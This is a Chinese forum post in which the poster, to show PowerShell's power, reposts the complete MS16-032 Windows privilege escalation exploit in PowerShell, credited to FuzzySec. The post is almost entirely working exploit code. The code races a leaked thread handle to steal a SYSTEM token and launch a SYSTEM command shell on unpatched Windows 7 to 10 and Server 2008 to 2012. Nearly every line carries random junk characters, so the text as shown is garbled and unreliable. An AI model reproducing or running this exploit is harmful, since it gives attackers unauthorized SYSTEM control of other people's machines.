古黑币0 个
成长值350 点
金币562 个
精华贴0 个
这个用户很懒,还没有填写自我介绍呢~
本帖最后由 soarcloud 于 2016-8-13 09:44 编辑
2 s' X- C4 u, v0 i& X
+ \$ f* M; t1 W1 I) o, |之前转了一堆关于Powershell基础的帖子,但是估计大家对Powershell到底能做什么还是没有个具体概念。那么下面就贴个用于用户提权的Powershell代码,看了之后就应该明白Powershell能干什么了#j334:不要问我提权是什么,如果这个都不清楚,那么就再好好学学吧#j346:( ]% `2 b9 ^9 T {; C
6 e3 ]' w+ H4 q7 z
+ j4 r$ l9 z. W2 tfunction Invoke-MS16-032 {
' |7 y$ w( x" ]- _<#
/ m* @4 g- {" C: J.SYNOPSIS2 x" @% r* J( W0 I$ w; @
1 X1 E0 J6 t" d0 J2 e' G/ L7 P
PowerShell implementation of MS16-032. The exploit targets all vulnerable v3 A4 o' S' \: A
operating systems that support PowerShell v2+. Credit for the discovery of
. O$ |: S6 J& W+ r/ X2 m the bug and the logic to exploit it go to James Forshaw (@tiraniddo).8 m) {) W7 o; a( d
3 L0 y' p9 j0 t' p Targets:4 B# s* W+ T. x! M3 k1 `+ Q
" e: b% M+ Z7 z9 G% t4 k) C
* Win7-Win10 & 2k8-2k12 <== 32/64 bit!
8 r) K3 s- y6 g i/ U5 l1 S * Tested on x32 Win7, x64 Win8, x64 2k12R28 _+ I# j2 H+ ~( Y
( v/ k/ _- X3 F8 ], e6 l- l
Notes:! C9 M9 c5 q {8 X! I
- _# n, b C/ S/ I+ P/ S* h% f& A
* In order for the race condition to succeed the machine must have 2+ CPU4 P* r; D% w" j
cores. If testing in a VM just make sure to add a core if needed mkay.
3 q0 t! _/ b8 U * The exploit is pretty reliable, however ~1/6 times it will say it succeeded" P; N% E) A; a0 w5 {7 I
but not spawn a shell. Not sure what the issue is but just re-run and profit!
. @; I0 W0 e) T! C* o * Want to know more about MS16-032 ==>2 j2 g, f: s6 v/ H
https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
, b; `2 H6 A/ Z( h2 U.DESCRIPTION/ Z9 P$ ^* L4 v6 F
Author: Ruben Boonen (@FuzzySec)
2 Z: r% f6 I# V1 m Blog: http://www.fuzzysecurity.com/
$ w( F0 D2 w x+ z- g License: BSD 3-Clause
! Y2 a4 D: d+ u4 |; O: U: F Required Dependencies: PowerShell v2+
% ^/ y7 c3 j1 W" k. u Optional Dependencies: None
. T( o2 ~+ |' w1 J9 k. m E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736! ?+ f- w. q4 ^& I" W7 x1 V8 k ?+ s: V
W& S5 R* `9 c4 t1 P8 h9 Y! D.EXAMPLE' y) r/ c" t1 \' Y% C# o6 Y
C:\PS> Invoke-MS16-032) S l$ C8 \' n% V
#>
2 q' Y- B8 ~+ h( ~- O: Q6 s Add-Type -TypeDefinition @"
* b0 b: v/ N$ L* x6 J( F% s& E" V using System;
; h% F! a: S2 J3 L8 g1 W. M- K using System.Diagnostics;
0 q0 n7 {" s2 O' J using System.Runtime.InteropServices;. x( F. C# p& N4 g: w- @9 w
using System.Security.Principal;
# j2 M: [8 V6 Q2 d. D3 P8 J ! Z8 V2 r5 V' U! S2 p
[StructLayout(LayoutKind.Sequential)]
* [ s7 ^" M# r6 X8 K+ | public struct PROCESS_INFORMATION
2 C$ m: A4 o* Y {0 O/ p& m, U: s) ~, F
public IntPtr hProcess;
& l4 z- ^7 \% j7 G public IntPtr hThread;
- o4 p0 P! h$ O: e& s" D public int dwProcessId;' o! I) [) j! s8 l% p4 i
public int dwThreadId;" y8 s3 Z' y, U% b
}
8 \) g. Z8 M7 Z1 L ) i! A9 V; p% D
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] l* A5 l! B# f6 G1 C
public struct STARTUPINFO
* i. Z- t5 a; v1 z | {4 [$ v1 x/ T, e7 y( p
public Int32 cb;0 j$ ` x$ O( k7 v
public string lpReserved;! |0 g G3 n( [- D
public string lpDesktop;
( r, c) C1 Z/ T: Z5 S" K6 ^- x public string lpTitle;
4 G: U: o, Y/ ~; ~; k public Int32 dwX;, j, ]7 a8 d- e) o! ]2 V+ l) B
public Int32 dwY;5 X$ O# g* @+ X" J/ D
public Int32 dwXSize;
/ l$ |% e4 z0 j public Int32 dwYSize;$ }* r5 R. z$ T$ \3 f# `3 V
public Int32 dwXCountChars;
+ ^ e2 r0 ]2 B5 o1 P& H6 v public Int32 dwYCountChars;
# s1 }3 B8 `7 n public Int32 dwFillAttribute;' C4 I" Q/ V. ]. A! H1 ]
public Int32 dwFlags;" X. K9 Z4 b- }5 g
public Int16 wShowWindow;7 f6 \5 d% J2 j
public Int16 cbReserved2;
1 }7 l% ^+ h$ F6 ^5 l/ G public IntPtr lpReserved2;" T! m( y4 Z4 K4 N6 e
public IntPtr hStdInput;5 V) Y* |( N2 F% T4 J
public IntPtr hStdOutput;1 x! w( m. W, W3 T. L' D3 a
public IntPtr hStdError;5 L. m0 [! }% o$ J8 K% ]4 d6 C- z
}
1 d& ?* _; x- T5 A5 P8 l8 j) L
+ E# D& s _% M/ m9 o [StructLayout(LayoutKind.Sequential)]; L% m- n: r# L- N- W
public struct SQOS7 l2 C9 o) o. D) {
{1 w8 J6 n F# f9 l$ ?+ K! M2 x
public int Length;
9 d2 d; A" P% ^" h! o8 B public int ImpersonationLevel;7 e' J1 y9 Y* @5 X. j$ K, o: K# J$ y
public int ContextTrackingMode;
& d* C/ M% k& D1 G8 E7 W public bool EffectiveOnly;
; ^1 G" k l5 j; Y }+ [2 N: k- D% x/ D
- V2 f- B& ~; u; n+ F6 {7 ?) p
public static class Advapi32$ v) Q: N+ M0 h, K1 _
{
0 F0 I w4 l% t c+ E7 ] [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
( A" s. S+ i2 h4 X public static extern bool CreateProcessWithLogonW(
- q6 P+ w# z. B9 _$ J' S: _ String userName,* g1 v" l# U4 ~* p" S( o- E9 E! D
String domain,& j) c" T# h/ B. A. W% Z0 b2 ~
String password,
/ M# }$ [4 h7 G0 @/ e$ t8 R int logonFlags,7 ` h, f' m5 N$ ~' u" T/ d" n
String applicationName," M& `' V6 l/ q+ G
String commandLine,& u: e/ ]: u b9 W
int creationFlags,
6 z2 ?$ C* K% }& }+ A, ]2 m int environment,$ _- D$ o2 m8 t5 n
String currentDirectory,9 |! s. y8 I1 _; \3 e
ref STARTUPINFO startupInfo,' I5 k7 B( Z0 l1 [4 j
out PROCESS_INFORMATION processInformation);
3 E v2 S6 R4 |# U# A: H1 f, i
, ?4 `# `# j3 v! f6 N [DllImport("advapi32.dll", SetLastError=true)]/ O9 S, s( j; y
public static extern bool SetThreadToken(
% g% H& p6 {1 e2 t ref IntPtr Thread,& ?, [+ R3 N$ B) G0 ?' L$ K0 O
IntPtr Token);, ~ j q3 z F% V5 ~6 }7 Q
- O1 R2 s( l; @, x [DllImport("advapi32.dll", SetLastError=true)]. Y7 M& ^ z& O Q2 z3 m7 e# A
public static extern bool OpenThreadToken(- X7 V( r Q/ x; m2 k/ }+ y
IntPtr ThreadHandle,
) B4 E/ y ]' K int DesiredAccess,
7 i5 i. C7 R& ~8 J2 P# h bool OpenAsSelf,$ ^& h7 U' N4 ]4 J
out IntPtr TokenHandle);, Y* U1 V2 D$ {: `
' A+ X3 J9 K( N+ `7 U [DllImport("advapi32.dll", SetLastError=true)]0 y9 z" x# ~% y! L. E/ W' B
public static extern bool OpenProcessToken(
7 W- y# }- j. B IntPtr ProcessHandle, - T3 f* t& M1 F" v* b
int DesiredAccess,; D j5 O" p6 {7 _. a
ref IntPtr TokenHandle);
4 T$ f! e% Z& a$ I' w
$ d9 G8 p7 ?- C! x( y5 H( W0 Q [DllImport("advapi32.dll", SetLastError=true)]: w5 r2 I6 r- O" N3 E
public extern static bool DuplicateToken(" P1 P/ f9 y$ _5 T0 ?, F
IntPtr ExistingTokenHandle,7 W" R% U& g5 I5 M' l2 l7 ?& U# Q
int SECURITY_IMPERSONATION_LEVEL,
* w/ Z& X7 e4 R4 f6 G: r6 o9 T ref IntPtr DuplicateTokenHandle);9 a/ H$ i: C/ v* C) q0 x, u
}
9 V' L) O6 K9 D- n: c' K' ? Q+ d5 [# ]2 F
public static class Kernel328 `% X0 z/ c- a/ o
{
+ U4 u1 Q! m4 V# X2 W# y" X) o [DllImport("kernel32.dll")]0 n9 B0 m; B7 V5 Y, a' ^# V
public static extern uint GetLastError();, e! G! S: V! u+ i
" I1 }' f. g5 I& K+ C8 } [DllImport("kernel32.dll", SetLastError=true)]
+ m1 r# q# l8 m+ w0 l. [ public static extern IntPtr GetCurrentProcess();
7 K. r7 [4 J4 s7 Z [ x" V* n7 n* m& }! Y" Q) W8 x
[DllImport("kernel32.dll", SetLastError=true)]* S1 U% w0 Y" r2 s) q# o% a
public static extern IntPtr GetCurrentThread();" p+ ]# _/ t8 |3 G
/ I6 L, R. z4 G& H" G% _ [DllImport("kernel32.dll", SetLastError=true)]" e: `! T5 b% P/ Q
public static extern int GetThreadId(IntPtr hThread);% i! e7 R: @6 t! l0 u
$ D7 \3 R1 h. N0 J; ~ [DllImport("kernel32.dll", SetLastError = true)]
6 y4 Q+ _/ p7 T" G6 Y# ~& \; |+ g public static extern int GetProcessIdOfThread(IntPtr handle);1 |7 V. V1 \0 }9 l- i3 _
; D2 Y T/ y8 r& ?
[DllImport("kernel32.dll",SetLastError=true)]
# C( S' L7 u; h6 O public static extern int SuspendThread(IntPtr hThread);! }' C* a7 o, f* L5 u8 U- Q& G! L6 X9 _! C
/ o/ h& C$ L/ |% I
[DllImport("kernel32.dll",SetLastError=true)]
, O% N7 Q' K6 B1 [: _5 ? public static extern int ResumeThread(IntPtr hThread);7 K x9 i; s3 b, o) l& j1 y5 p
, c# o' _4 k9 {& m [DllImport("kernel32.dll", SetLastError=true)]! e% D( m2 Q& P2 r( V
public static extern bool TerminateProcess(
. `+ s/ Y# i6 {1 L4 ]( | IntPtr hProcess,; L) q& U% k3 I; m; x2 `
uint uExitCode);
4 E* `. ~$ c* { u$ I6 W+ }! ]( m9 U9 u 6 Q4 |1 T6 x# b' y- w4 a. q- g
[DllImport("kernel32.dll", SetLastError=true)]% r- p4 E( F% a' ^; }$ S5 e+ R" p
public static extern bool CloseHandle(IntPtr hObject);
/ A ?" i3 J" l7 ~, v7 X4 P - @8 u: n p2 t B: Q
[DllImport("kernel32.dll", SetLastError=true)]9 ~" v" a7 w5 i7 d
public static extern bool DuplicateHandle(
6 e2 j3 S2 \1 R: Y. ?) e& y* p' c IntPtr hSourceProcessHandle,
1 H9 w+ f( `' W* t( | IntPtr hSourceHandle,
3 s# O$ m/ m4 t h IntPtr hTargetProcessHandle,% Z9 M) @- Q/ Z( G) j% a
ref IntPtr lpTargetHandle,
/ @& u3 e" R# Q3 q' } int dwDesiredAccess,
( N( s# Y( f: I/ T( D4 L( L/ q bool bInheritHandle,
2 B$ n* C; |+ a# g7 | int dwOptions);: a; R" @9 x0 I1 Z3 r
}
; S1 N7 J7 Z! W6 `) t; P: @$ G 4 h/ z. m8 ?6 E$ j# m' _
public static class Ntdll5 ]$ h7 c: M$ j
{' [( G7 n' O) }/ d3 f0 {
[DllImport("ntdll.dll", SetLastError=true)]
$ O* K8 {1 R. n public static extern int NtImpersonateThread(
$ b4 n0 [+ L; B IntPtr ThreadHandle,( ~8 ^ j; Y% \
IntPtr ThreadToImpersonate,
9 r, ?+ p: N* |9 J ref SQOS SecurityQualityOfService);
) L( c4 c/ \2 d* D+ r1 S }# B5 `1 l9 A6 L; J6 F3 ~1 r+ l
"@ ~. B7 t" ^5 I0 T+ s1 Z' F
7 ~4 Z% [. V: G) b function Get-ThreadHandle {$ X a# u6 u' _2 D- b" H
# StartupInfo Struct/ A; |# I' ~7 h+ K; o# s" F
$StartupInfo = New-Object STARTUPINFO8 t/ I2 u4 w+ M9 h: k% Z- g* U# I" @
$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
, z) k2 D* E0 a: y& _ $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread(): x# e" Z+ J7 C S# n
$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()5 k8 o. A L! G
$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()5 {! S& s5 y6 u2 A. E7 x6 y
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size* ~) |2 Q' ^% D" ]9 Y9 D
' [6 k8 ^; U8 R: o7 n( t9 p
# ProcessInfo Struct& g1 P+ q2 n0 E" l
$ProcessInfo = New-Object PROCESS_INFORMATION: a3 l9 m9 U; _8 L( s: s- S' u
. @- o0 [1 b8 n' ]# i" p, `
# CreateProcessWithLogonW --> lpCurrentDirectory6 K& E$ d7 K/ ~( d8 T, l i4 ^
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+ M0 t( f# B$ O, X( u
4 s9 w g3 }0 k P # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+ |8 ^: H1 Q2 V" E1 x" Q1 \/ N $CallResult = [Advapi32]::CreateProcessWithLogonW(, u0 N7 v. q& n( Z7 X9 [( t5 L3 j- O
"user", "domain", "pass",' s( h. `/ C3 d. a' d n
0x00000002, "C:\Windows\System32\cmd.exe", "", y- C8 Z6 g- f0 L# b- E
0x00000004, $null, $GetCurrentPath,
! Y7 M' s/ [2 ?: D0 v2 J2 j [ref]$StartupInfo, [ref]$ProcessInfo)
1 K4 R, s5 Q) P& [ z H+ o2 \0 X- u( e; x% i) C8 R
# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS# I. e; Z6 X2 v6 v% f8 A/ d
$lpTargetHandle = [IntPtr]::Zero6 K7 p% V% d5 g1 ] g- u2 I9 U
$CallResult = [Kernel32]::DuplicateHandle(
9 x+ R0 `8 Y& ]" l+ _0 ` $ProcessInfo.hProcess, 0x4,
3 ^# j/ r8 Y6 t* z [Kernel32]::GetCurrentProcess(),0 k" `. \& p& W3 F
[ref]$lpTargetHandle, 0, $false,
7 b5 e, e l# g( Y2 t. K1 J 0x00000002)2 J- J+ p3 M6 |6 U! X
6 P) z+ I# A/ E6 l" ] # Clean up suspended process6 t$ s$ V! a+ |8 }
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1): E: Z5 Z+ j4 [. { t
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
; Z; w& ^' ^5 [% c0 _( b$ L$ E( | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
4 K3 r% L5 j! m* T0 x$ k 8 o% \9 U/ l- h0 ]* y1 f; |
$lpTargetHandle
. m( H8 z+ o( X9 V }- |* L( q, N6 P: c
7 [1 @5 U5 }- ?/ A4 t function Get-SystemToken {
; p" K6 s. t8 k" u' L: a* t1 t echo "`n[?] Trying thread handle: $Thread" T* t+ F! h5 e
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"- r" A& J1 H- R2 a" H
, g; |* U! f2 {) Y+ e; Q- ~# w
$CallResult = [Kernel32]::SuspendThread($Thread)0 I. R/ @* i1 e" G
if ($CallResult -ne 0) {* `" k+ D! o% U! Y1 E& v
echo "[!] $Thread is a bad thread, moving on..". Z, V6 J; P4 r% P; ]1 s9 p3 p" V
Return
, Q6 h4 e( c9 u: C5 v6 J } echo "[+] Thread suspended") f' `' a7 b5 u3 g
+ C, }: |3 u" e6 k6 M9 e echo "[>] Wiping current impersonation token"0 O1 X4 K" h; L$ G( s* c, v+ u
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
1 j' U' [' z# d/ E; z if (!$CallResult) {
0 U5 I" o, [% n5 @* L echo "[!] SetThreadToken failed, moving on.."( W% v) y+ D! A$ z: ~+ x$ _! {
$CallResult = [Kernel32]::ResumeThread($Thread)) U t, w, _, ~
echo "[+] Thread resumed!"( w6 W" J& ` y9 ~
Return
! H2 n V$ h5 U, B0 P1 {6 N }
/ l; h: Q$ r: ^6 C k. \3 ]7 o1 P! e5 e* C4 E8 J
echo "[>] Building SYSTEM impersonation token"/ W1 w+ E2 D. e; ^( A9 }
# SecurityQualityOfService struct% _, f9 H) ]; g
$SQOS = New-Object SQOS
$ B2 T5 M' p7 c$ W8 c& S $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
0 g3 T$ F" I0 T5 P/ _- I $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+ E5 w. k! r7 J1 ~ # Undocumented API's, I like your style Microsoft ;)" K: \! P/ [" q b3 y. M- a8 D2 q$ c
$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
% x6 R4 l# Z( ~( H# `" _6 w$ X if ($CallResult -ne 0) {
7 {% U9 |- P$ | T echo "[!] NtImpersonateThread failed, moving on.."# D/ r$ C, i" q! N! Z- z
$CallResult = [Kernel32]::ResumeThread($Thread)! H: R8 X O% D. H/ m
echo "[+] Thread resumed!"" Z Q" `4 R( g j
Return; H+ ~6 p* w' ^% z! A$ {
}& n& o+ F8 I* @% Y
$ D2 i& G! _, F/ c* Y8 V* U $script:SysTokenHandle = [IntPtr]::Zero9 Z, I2 t7 J& ~1 A
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
5 c( S1 P f2 k5 b; R! W" Q $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
4 u2 _) v2 t, s7 T+ r3 p. [: W2 j if (!$CallResult) {- `! X; n3 [- Y. k( n4 I6 |- Y% ~
echo "[!] OpenThreadToken failed, moving on.."" S. o/ [5 `) E5 D3 o. z
$CallResult = [Kernel32]::ResumeThread($Thread)* E. a& Q% H% m/ H
echo "[+] Thread resumed!"
4 H/ }5 Q# ?+ |+ S Return
) G8 k2 ^. E+ Z6 D- G3 y }4 b' G- W' z0 a- f7 o
' t: l L3 O; X0 q9 e
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
1 z( G9 | y( C h echo "[+] Resuming thread.."3 X5 L& C" Z$ b
$CallResult = [Kernel32]::ResumeThread($Thread)! V3 N! ]8 q8 }
}2 {0 G% |3 Q+ W: O7 y. A% e
9 |! a" c2 U, Z) O # main() <--- ;)6 A; a2 [2 o: X- s
$ms16032 = @"8 a0 _) I& m8 K( U* ~* F) c- F2 I. m, q
__ __ ___ ___ ___ ___ ___ ___
6 j0 Q$ S' O& l. s' b | V | _|_ | | _|___| |_ |_ |; s3 W2 t5 }# d% ]% N$ P
| |_ |_| |_| . |___| | |_ | _|
8 [7 O/ y2 i* o V |_|_|_|___|_____|___| |___|___|___|
- W/ S4 G2 X: d0 p1 S- C 0 w J1 L( v+ H: D
[by b33f -> @FuzzySec]: K% S0 M. ~7 _% K9 ?
"@# ~7 X A' R% Q% }
; D, C/ j' R+ |$ \+ ]% b
$ms16032
; Y: O" a! |, @: q, |) O9 c
p. B E5 J- A* _ # Check logical processor count, race condition requires 2+ N( [- c( [, Y8 x- D( Y% z' }
echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
. f. r9 i2 X& F. y$ f/ R5 c if ($([System.Environment]::ProcessorCount) -lt 2) {
* o# k2 ~5 a- X2 {2 v0 d7 M echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
# L! O' c+ i! _+ C9 L2 N Return2 |, N; j% U) K# O
}
* Z+ \0 w/ G) E2 @ B9 M
4 y) ?; v, Q3 m( U # Create array for Threads & TID's z9 a5 W6 N3 U+ M" R0 g
$ThreadArray = @(): s6 D! x5 u6 K* b
$TidArray = @()
" R* G* ~0 d% h 1 w3 P) ^7 u( `; v8 ~/ w: S8 q
echo "[>] Duplicating CreateProcessWithLogonW handles.."1 j9 B4 z4 o, I/ I& C& W
# Loop Get-ThreadHandle and collect thread handles with a valid TID
; h7 @9 O" F% c* G; ?! X, E. v for ($i=0; $i -lt 500; $i++) {& g6 x+ p6 s1 [0 \
$hThread = Get-ThreadHandle' g1 k; J: I5 [9 k6 P* I( x
$hThreadID = [Kernel32]::GetThreadId($hThread)
* B3 G% U4 h" G p, D* n9 I: I # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
. H: r) e+ x( ^4 X% }0 ~4 ^ if ($TidArray -notcontains $hThreadID) {' h, k4 R8 T+ J' N% U
$TidArray += $hThreadID8 f% s" \; ?' `3 U
if ($hThread -ne 0) {6 U+ m4 F) `; H- C F
$ThreadArray += $hThread # This is what we need!% y6 ~6 g- u% I4 n1 C. |
}! E, Y2 u# Y" F* z
}" Y* j& e7 @, R$ U: E) Q
}
( b# s# w/ g% R# n( h% \' S+ f9 H 5 S$ y: U) }. \' D
if ($($ThreadArray.length) -eq 0) {
]1 [7 F4 `; F+ Q4 N ]5 j+ _; P echo "[!] No valid thread handles were captured, exiting!"! ?' e1 R! D- U9 ~0 P( D: z
Return; g, E" `" ~+ {, G
} else {
$ F$ r' k9 Z | echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"6 \3 r) s) r4 o+ O; {
echo "`n[?] Thread handle list:"
* W6 U" F' c5 ^/ C! ?% G3 Y: L $ThreadArray
" H4 d3 ?+ l8 a; z- c4 g8 z* c3 Z, l }
: Y3 L# d: H/ K' D8 R
2 y0 G7 W& X/ ~' p# p; S echo "`n Sniffing out privileged impersonation token.."
7 o- |* v& B/ j6 V1 t; @ foreach ($Thread in $ThreadArray){
# \; O9 d' G! F. l2 d) o6 B " Y; r# r6 z) n$ M; X" @9 g O5 Z6 h
# Get handle to SYSTEM access token
1 r$ O. z, ]) \4 C# l2 Z Get-SystemToken) P, I4 L: u [" [. \% b8 n5 j7 y
0 M, K# H9 O+ v2 |
echo "`n Sniffing out SYSTEM shell.."
4 M, D0 A8 n, s3 V* ` echo "`n[>] Duplicating SYSTEM token"" w$ o: Y$ D& B) K
$hDuplicateTokenHandle = [IntPtr]::Zero
# U( V! J' P1 ?$ H ~7 |! z $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
7 }0 J& x6 D% L, ]. z
* ^" G$ B- ?3 G6 X" P # Simple PS runspace definition- u- m- C9 @" k! T
echo "[>] Starting token race"
/ f& y+ h+ e4 M6 D; ?; K $Runspace = [runspacefactory]::CreateRunspace()
# G+ I# B& ]# {% D- { $StartTokenRace = [powershell]::Create()( @% V9 M( L; A! g4 ~
$StartTokenRace.runspace = $Runspace
" k! {4 J4 Q8 v& ^7 l+ m $Runspace.Open()/ J# V9 R B& C. p3 O7 N1 j
[void]$StartTokenRace.AddScript({6 Z: R2 U4 g# A. k% z2 i
Param ($Thread, $hDuplicateTokenHandle)6 d) z6 m" t5 ]. D1 R
while ($true) {
2 f5 C ^; A( |, ]7 }7 c4 X" n $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)& \6 u: }7 ]3 Z+ ?, H
}; r- Q( j1 O1 B3 g: P* u
}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)2 l( \3 }) {* Q' V
$AscObj = $StartTokenRace.BeginInvoke(), E$ N6 i; |8 _
3 Q$ n: S0 [' ~2 V$ v
echo "[>] Starting process race"
7 k0 @1 w+ l; P# U2 D3 j0 S # Adding a timeout (10 seconds) here to safeguard from edge-cases
: K# ]5 _; Z9 n J8 ? g% E3 P- p1 r- P $SafeGuard = [diagnostics.stopwatch]::StartNew()6 U* a9 s8 Q4 z; V# h: f. _$ I# k
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {. [ m: Y7 _% n1 A# X8 _- a* }5 S
# StartupInfo Struct
3 q- ~, [* a8 w2 K4 i. C. N $StartupInfo = New-Object STARTUPINFO
% \6 [; I: m3 l7 I: q5 s/ Q- d $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size2 Z6 R9 @" h& G+ ~+ M
+ [0 O$ u1 X; f! ^9 h" V' v8 O& e7 N" [
# ProcessInfo Struct9 D4 ~: s0 F# d% x) c
$ProcessInfo = New-Object PROCESS_INFORMATION
( z! J: V; T; G) V , ^- M% X; R- {1 a; O
# CreateProcessWithLogonW --> lpCurrentDirectory. O4 Z- Q' f+ h* X( Z
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
' r# m' x1 d K8 X 0 H- ~+ {# g; e# _" P2 x, }- D8 h
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED2 s [% z$ X1 `% n+ J
$CallResult = [Advapi32]::CreateProcessWithLogonW(; `% g% Q7 B! s" K& R: ` H$ V
"user", "domain", "pass",* [8 w3 g0 j: t( e- E3 T+ J# F
0x00000002, "C:\Windows\System32\cmd.exe", "",
5 t; \; ^: a* b5 V 0x00000004, $null, $GetCurrentPath,/ x9 @/ j& Y: ^
[ref]$StartupInfo, [ref]$ProcessInfo)
$ k! }, w9 o! o8 d4 ~7 ]# L8 p
: H4 ^5 @# W/ A! \ e* g) y: X $hTokenHandle = [IntPtr]::Zero
; F) C6 ^6 J# N- z $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle): y+ N/ ]3 t* b6 g3 x
# If we can't open the process token it's a SYSTEM shell!
2 l0 i8 C7 \- {' W if (!$CallResult) {9 M, I2 Z- H' ?+ _0 Y* x/ G) K
echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
p4 p; E& x: k; J $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)9 ~" d9 g5 Z t2 Q9 o; Y
$StartTokenRace.Stop()5 }: ~! K9 Z6 {
$SafeGuard.Stop()7 O) Y1 \" a1 l. ]5 x ^6 s, ]9 l' [
Return/ F/ _5 m2 a4 p9 u. c
}
4 i# P0 Z8 K1 n# g: |/ f% [ , f9 t; f8 d. d* v) [
# Clean up suspended process
E2 T7 o1 O$ @! r+ o $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
3 i) z5 k ^/ |* C2 y' j O $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)" V/ H) z; |, [* N5 N3 c3 f' c
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+ [ }# |" T2 _7 U. Q }# H: N8 g4 b/ f# x2 B
1 A6 t6 n f! E5 M; Q7 v) i. o) l # Kill runspace & stopwatch if edge-case0 J, T6 ?7 n' r# J0 Y, V, F
$StartTokenRace.Stop()
; f: n2 b6 n1 s $SafeGuard.Stop()
3 H2 w; }1 B& d- f }
, }, X# c9 z$ s' a7 R}
( `- P! b2 H, y' O看完代码后,长期从事windows编程的同学应该已经看出来powershell的强大功能了吧。呵呵。
+ x# k, W- R" u6 [" d- D1 [. {8 X; V" {2 t, G
8 R1 p3 B5 i- i4 `+ ^: q- p8 E. i
. k' Z$ N" X" |
, b* y! _9 f- K- G, E Z0 u5 x+ L
, v8 y4 K: H2 u! m
|
|
「龙战于野」
2016-8-13 09:01
变色卡
「古黑浩劫」
古黑论